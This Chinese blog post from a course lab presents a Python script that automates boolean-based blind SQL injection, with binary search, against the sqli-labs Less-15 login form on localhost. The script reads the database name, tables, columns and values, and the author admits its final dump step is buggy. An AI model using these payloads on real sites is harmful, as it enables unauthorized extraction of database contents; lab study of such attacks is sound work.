【Python】面向Sqli-Labs Less15的布尔盲注二分法脚本

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量1.7k 收藏 11
点赞数 2
分类专栏: Python 文章标签: python sql web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/127928367
版权

前言

其实写这个python脚本是为了完成我某节课的某个实验

 代码里有一堆一堆的for循环,导致程序整个运行下来起码需要一个小时,而且还是基于二分法的qwq。本来想说去学一学python的多线程提升一下效率,但我发现我这代码一环扣一环,也没法用多线程并发。。那就算了吧

编程思路

思路就是按照普普通通的sql盲注的思路编写:

1、测试数据库名的长度(length()函数)

def db_length(url):
    global n
    print("----------测试数据库库名长度中----------")
    for i in range(10):
        payload="admin' and length(database())=%d#" % (i)
        param={"uname":payload,"passwd":"123"}
        res=requests.post(url,data=param)
        if "flag" in res.text:#有flag代表成功
            break
    print("数据库库名长度为%d" % i)
    n=i

2、用二分法爆数据库名(ascii()、substr()函数)

def db_name(url):
    print("----------读取数据库库名中----------")
    result=''
    for i in range(1,n+1):#使用二分法
        low=32
        high=128
        mid=(low+high)//2
        while (low<high):
            payload="admin' and ascii(substr(database(),%d,1))<%d#" % (i,mid)
            param = {"uname": payload, "passwd": "123"}
            res = requests.post(url, data=param)
            if "flag" in res.text:
                high=mid
            else:
                low=mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
        # break直接跳出来最外面的for循环
            break
        result=result+chr(mid-1)
    print("数据库名为:"+result)

3、测试表的数量

def table_num(url):
    global tablenum
    print("----------测试数据库表的数量中----------")
    for i in range(10):
        payload = "admin' and (select count(table_name) from information_schema.tables where table_schema=database())=%d#" % (i)
        param = {"uname": payload, "passwd": "123"}
        res = requests.post(url, data=param)
        if "flag" in res.text:
            break
    print("数据库共有%d个表" % i)
    tablenum=i

4、测试每个表的表名长度

def table_length(url):
    # tablenum=4
    global tablelen
    print("----------测试各个表的表名长度中----------")
    tablelen = []
    for i in range(tablenum):
        for j in range(1,10):
            payload = "admin' and length(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),1))=%d#" % (i,j)
            param = {"uname": payload, "passwd": "123"}
            res = requests.post(url, data=param)
            if "flag" in res.text:
                tablelen.append(j)
                break
    print(tablelen)

5、读取表名

def table_name(url):
    global tables
    # tablelen=[6, 8, 7, 5]
    print("----------读取表名中----------")
    tables = []
    tindex=0
    for item in tablelen:
        result=""
        for i in range(1, item + 1):
            low = 32
            high = 128
            mid = (low + high) // 2
            while (low < high):
                payload = "admin' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))<%d#" % (tindex,i, mid)
                param = {"uname": payload, "passwd": "123"}
                res = requests.post(url, data=param)
                if "flag" in res.text:
                    high = mid
                else:
                    low = mid + 1
                mid = (low + high) // 2
            if mid <= 32 or mid >= 127:
            # break直接跳出来最外面的for循环
                break
            result = result + chr(mid - 1)
        tindex=tindex+1
        tables.append(result)
    print("表名为:",end='')

6、测试每张表里的字段数量

def column_num(url):
    # tables=['emails', 'referers', 'uagents', 'users']
    global columnnum
    columnnum=[]
    print("----------测试数据库每张表中字段的数量中----------")
    for table in tables:
        for i in range(20):
            payload = "admin' and (select count(column_name) from information_schema.columns where table_name='%s')=%d#" % (table,i)
            param = {"uname": payload, "passwd": "123"}
            res = requests.post(url, data=param)
            if "flag" in res.text:
                columnnum.append(i)
                break
        print("%s表共有%d个字段" % (table,i))

7、测试各个字段的长度

def column_length(url):
    global columnlen
    # columnnum=[2,3,4,11]
    # tables = ['emails', 'referers', 'uagents', 'users']
    print("----------测试各个表中每个字段的字段名长度中----------")
    columnlen = []
    k=0
    for table in tables:
        m=columnnum[k]
        for i in range(m):
            for j in range(1, 20):
                payload = "admin' and length(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),1))=%d#" % (table,i, j)
                param = {"uname": payload, "passwd": "123"}
                res = requests.post(url, data=param)
                if "flag" in res.text:
                    print("表名:%s  字段标号:%d  字段长度:%d" % (table,i+1,j))
                    columnlen.append(j)
                    break
        k=k+1
        columnlen.append('|')
    print(columnlen)

8、读取字段名

def column_name(url):
    # columnlen=[2, 8, '|', 2, 7, 10, '|', 2, 6, 10, 8, '|', 7, 10, 9, 4, 8, 6, 10, 12, 2, 8, 8, '|']
    # columnnum = [2, 3, 4, 11]
    # tables = ['emails', 'referers', 'uagents', 'users']
    print("----------读取字段名中----------")
    l=0#用于cindex的range范围的下标
    global columns
    columns=[]
    copycolumnlen=columnlen
    for table in tables:
        SpColumnLen = []
        for k in range(len(copycolumnlen)):#根据 | 分离出每张表不同字段的长度列表
            tmp=copycolumnlen[k]
            SpColumnLen.append(tmp)

            if copycolumnlen[k] == '|':
                SpColumnLen.pop()
                copycolumnlen[0:k+1]=[]
                break

        # print(SpColumnLen)
        for cindex in range(columnnum[l]):
            # for item in SpColumnLen:
            item=SpColumnLen[cindex]
            result = ""
            for i in range(1, item + 1):
                low = 32
                high = 128
                mid = (low + high) // 2
                while (low < high):
                    payload = "admin' and ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d))<%d#" % (table,cindex, i, mid)
                    param = {"uname": payload, "passwd": "123"}
                    res = requests.post(url, data=param)
                    if "flag" in res.text:
                        high = mid
                    else:
                        low = mid + 1
                    mid = (low + high) // 2

                if mid <= 32 or mid >= 127:
                    # break直接跳出来最外面的for循环
                    break
                print(chr((mid-1)))
                result = result + chr(mid - 1)

            columns.append(result)
            print("表名为:%s  字段名为:%s" % (table,result))

        l=l+1
        columns.append('|')
        print(columns)

9、读取字段值

这里我的代码有点问题,导致最后只能输出email表id字段的值和email_id的部分值,其实我是有点想法的,可能需要在for循环里再加一层嵌套去测试这个字段的值的数量(count),再根据数量去读取具体的值,但我实在是心力憔悴,暂且先摆放在这当作一个思路参考吧= =

def dump(url):
    print("----------读取字段值中----------")
    # tables = ['emails', 'referers', 'uagents', 'users']
    # columnnum = [2, 3, 4, 11]
    # columns = ['id', 'email_id', '|', 'id', 'referer', 'ip_address', '|', 'id', 'uagent', 'ip_address', 'username', '|', 'user_id', 'first_name', 'last_name', 'user', 'password', 'avatar', 'last_login', 'failed_login', 'id', 'username', 'password', '|']
    copycolumns=columns
    l=0
    global ValueLen
    for table in tables:
        SpColumn = []

        for k in range(len(copycolumns)):  # 根据 | 分离出每张表不同字段的名字
            tmp = copycolumns[k]
            SpColumn.append(tmp)

            if copycolumns[k] == '|':
                SpColumn.pop()
                copycolumns[0:k + 1] = []
                break
        print(SpColumn)
        for cindex in range(columnnum[l]):
            column=SpColumn[cindex]
            print(column)
            ans=""
            for j in range(1, 500):
                payload = "admin' and length(substr((select %s from %s limit %d,1),1))=%d#" % (column,table,cindex, j)
                param = {"uname": payload, "passwd": "123"}
                res = requests.post(url, data=param)
                if "flag" in res.text:
                    ValueLen=j  #不同字段值的长度
                    print("Valuelen="+str(ValueLen))
                    break
            # print(ValueLen)

            for i in range(1, ValueLen + 1):
                # print(i)
                low = 32
                high = 128
                mid = (low + high) // 2
                while (low < high):
                    payload = "admin' and ascii(substr((select %s from %s limit 0,1),%d,1))<%d#" % (column,table, i, mid)
                    param = {"uname": payload, "passwd": "123"}
                    res = requests.post(url, data=param)
                    if "flag" in res.text:
                        high = mid
                    else:
                        low = mid + 1
                    mid = (low + high) // 2

                if mid <= 32 or mid >= 127:
                    # break直接跳出来最外面的for循环
                    break
                ans = ans + chr(mid - 1)
                # print(ans)

            print("表名为:%s  字段名为:%s  字段值为:%s" % (table, column,ans))
        l = l + 1

实验结果

 

 后面的字段的值出不来就没有截图了

 

 

源代码 

 里面一些参数的注释是我在一个个测试函数的时候用的,可以当作个答案参考吧

import requests
import time
url='http://127.0.0.1/bachang/sqli-labs-master/Less-15/'



def db_length(url):
    global n
    print("----------测试数据库库名长度中----------")
    for i in range(10):
        payload="admin' and length(database())=%d#" % (i)
        param={"uname":payload,"passwd":"123"}
        res=requests.post(url,data=param)
        if "flag" in res.text:#有flag代表成功
            break
    print("数据库库名长度为%d" % i)
    n=i

def db_name(url):
    print("----------读取数据库库名中----------")
    result=''
    for i in range(1,n+1):#使用二分法
        low=32
        high=128
        mid=(low+high)//2
        while (low<high):
            payload="admin' and ascii(substr(database(),%d,1))<%d#" % (i,mid)
            param = {"uname": payload, "passwd": "123"}
            res = requests.post(url, data=param)
            if "flag" in res.text:
                high=mid
            else:
                low=mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
        # break直接跳出来最外面的for循环
            break
        result=result+chr(mid-1)
    print("数据库名为:"+result)

def table_num(url):
    global tablenum
    print("----------测试数据库表的数量中----------")
    for i in range(10):
        payload = "admin' and (select count(table_name) from information_schema.tables where table_schema=database())=%d#" % (i)
        param = {"uname": payload, "passwd": "123"}
        res = requests.post(url, data=param)
        if "flag" in res.text:
            break
    print("数据库共有%d个表" % i)
    tablenum=i

def table_length(url):
    # tablenum=4
    global tablelen
    print("----------测试各个表的表名长度中----------")
    tablelen = []
    for i in range(tablenum):
        for j in range(1,10):
            payload = "admin' and length(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),1))=%d#" % (i,j)
            param = {"uname": payload, "passwd": "123"}
            res = requests.post(url, data=param)
            if "flag" in res.text:
                tablelen.append(j)
                break
    print(tablelen)
    return tablelen
def table_name(url):
    global tables
    # tablelen=[6, 8, 7, 5]
    print("----------读取表名中----------")
    tables = []
    tindex=0
    for item in tablelen:
        result=""
        for i in range(1, item + 1):
            low = 32
            high = 128
            mid = (low + high) // 2
            while (low < high):
                payload = "admin' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))<%d#" % (tindex,i, mid)
                param = {"uname": payload, "passwd": "123"}
                res = requests.post(url, data=param)
                if "flag" in res.text:
                    high = mid
                else:
                    low = mid + 1
                mid = (low + high) // 2
            if mid <= 32 or mid >= 127:
            # break直接跳出来最外面的for循环
                break
            result = result + chr(mid - 1)
        tindex=tindex+1
        tables.append(result)
    print("表名为:",end='')
    print(tables)


def column_num(url):
    # tables=['emails', 'referers', 'uagents', 'users']
    global columnnum
    columnnum=[]
    print("----------测试数据库每张表中字段的数量中----------")
    for table in tables:
        for i in range(20):
            payload = "admin' and (select count(column_name) from information_schema.columns where table_name='%s')=%d#" % (table,i)
            param = {"uname": payload, "passwd": "123"}
            res = requests.post(url, data=param)
            if "flag" in res.text:
                columnnum.append(i)
                break
        print("%s表共有%d个字段" % (table,i))

def column_length(url):
    global columnlen
    # columnnum=[2,3,4,11]
    # tables = ['emails', 'referers', 'uagents', 'users']
    print("----------测试各个表中每个字段的字段名长度中----------")
    columnlen = []
    k=0
    for table in tables:
        m=columnnum[k]
        for i in range(m):
            for j in range(1, 20):
                payload = "admin' and length(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),1))=%d#" % (table,i, j)
                param = {"uname": payload, "passwd": "123"}
                res = requests.post(url, data=param)
                if "flag" in res.text:
                    print("表名:%s  字段标号:%d  字段长度:%d" % (table,i+1,j))
                    columnlen.append(j)
                    break
        k=k+1
        columnlen.append('|')
    # print(columnlen)

def column_name(url):
    # columnlen=[2, 8, '|', 2, 7, 10, '|', 2, 6, 10, 8, '|', 7, 10, 9, 4, 8, 6, 10, 12, 2, 8, 8, '|']
    # columnnum = [2, 3, 4, 11]
    # tables = ['emails', 'referers', 'uagents', 'users']
    print("----------读取字段名中----------")
    l=0#用于cindex的range范围的下标
    global columns
    columns=[]
    copycolumnlen=columnlen
    for table in tables:
        SpColumnLen = []
        for k in range(len(copycolumnlen)):#根据 | 分离出每张表不同字段的长度列表
            tmp=copycolumnlen[k]
            SpColumnLen.append(tmp)

            if copycolumnlen[k] == '|':
                SpColumnLen.pop()
                copycolumnlen[0:k+1]=[]
                break

        # print(SpColumnLen)
        for cindex in range(columnnum[l]):
            # for item in SpColumnLen:
            item=SpColumnLen[cindex]
            result = ""
            for i in range(1, item + 1):
                low = 32
                high = 128
                mid = (low + high) // 2
                while (low < high):
                    payload = "admin' and ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d))<%d#" % (table,cindex, i, mid)
                    param = {"uname": payload, "passwd": "123"}
                    res = requests.post(url, data=param)
                    if "flag" in res.text:
                        high = mid
                    else:
                        low = mid + 1
                    mid = (low + high) // 2

                if mid <= 32 or mid >= 127:
                    # break直接跳出来最外面的for循环
                    break
                # print(chr((mid-1)))
                result = result + chr(mid - 1)

            columns.append(result)
            print("表名为:%s  字段名为:%s" % (table,result))

        l=l+1
        columns.append('|')
        # print(columns)


def dump(url):
    print("----------读取字段值中----------")
    # tables = ['emails', 'referers', 'uagents', 'users']
    # columnnum = [2, 3, 4, 11]
    # columns = ['id', 'email_id', '|', 'id', 'referer', 'ip_address', '|', 'id', 'uagent', 'ip_address', 'username', '|', 'user_id', 'first_name', 'last_name', 'user', 'password', 'avatar', 'last_login', 'failed_login', 'id', 'username', 'password', '|']
    copycolumns=columns
    l=0
    global ValueLen
    for table in tables:
        SpColumn = []

        for k in range(len(copycolumns)):  # 根据 | 分离出每张表不同字段的名字
            tmp = copycolumns[k]
            SpColumn.append(tmp)

            if copycolumns[k] == '|':
                SpColumn.pop()
                copycolumns[0:k + 1] = []
                break
        print(SpColumn)
        for cindex in range(columnnum[l]):
            column=SpColumn[cindex]
            print(column)
            ans=""
            for j in range(1, 500):
                payload = "admin' and length(substr((select %s from %s limit %d,1),1))=%d#" % (column,table,cindex, j)
                param = {"uname": payload, "passwd": "123"}
                res = requests.post(url, data=param)
                if "flag" in res.text:
                    ValueLen=j  #不同字段值的长度
                    print("Valuelen="+str(ValueLen))
                    break
            # print(ValueLen)

            for i in range(1, ValueLen + 1):
                # print(i)
                low = 32
                high = 128
                mid = (low + high) // 2
                while (low < high):
                    payload = "admin' and ascii(substr((select %s from %s limit 0,1),%d,1))<%d#" % (column,table, i, mid)
                    param = {"uname": payload, "passwd": "123"}
                    res = requests.post(url, data=param)
                    if "flag" in res.text:
                        high = mid
                    else:
                        low = mid + 1
                    mid = (low + high) // 2

                if mid <= 32 or mid >= 127:
                    # break直接跳出来最外面的for循环
                    break
                ans = ans + chr(mid - 1)
                # print(ans)

            print("表名为:%s  字段名为:%s  字段值为:%s" % (table, column,ans))
        l = l + 1

if __name__ == '__main__':
    time_start = time.time()  # 记录开始时间
    db_length(url)
    db_name(url)
    table_num(url)
    table_length(url)
    table_name(url)
    column_num(url)
    column_length(url)
    column_name(url)
    dump(url)
    time_end = time.time()  # 记录结束时间
    time_sum = time_end - time_start  # 计算的时间差为程序的执行时间,单位为秒/s
    print(time_sum)#单位为s
    print(time_sum/60)#单位为m

RexHarrr
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3436
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 391
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
sql-lap less8 二分法sql盲注脚本
qq_73722777的博客
04-14 239
【代码】sql-lap less8 二分法脚本
基于python布尔盲注爆破脚本sqli-libs第八关)
henghengzhao_的博客
10-06 1828
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
写一个布尔盲注脚本
weixin_35752645的博客
01-01 486
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sql注入自动化脚本POST和GET型
m0_73728268的博客
03-09 328
post和get型sql注入自动化脚本
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 999
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
SQL注入(盲注——二分法POST)
qq_43520778的博客
09-07 396
[toc]SQL注入。
python布尔盲注脚本
kiihuang的博客
03-28 492
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
Bool盲注脚本
Forever_Han13的博客
01-21 645
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
二分法实现SQL盲注
小菜猴子_x
09-12 1046
因为在buu上做题,然后无奈研究二分法实现SQL盲注
pythonsqli-labs15二分法时间盲注
Programmonkeykin的博客
12-11 4087
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分盲注实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
sqli-labs第十五和十六关(post请求-布尔盲注
qq_42266432的博客
08-26 855
开启第十五关,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs第七关盲注
08-31
对于sqli-labs的第七关,这是一道关于盲注的挑战。在这个关卡中,你需要利用盲注漏洞来获取敏感信息。 盲注是一种利用应用程序对用户输入的处理不当而导致的漏洞。这种漏洞通常出现在应用程序使用用户提供的数据来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值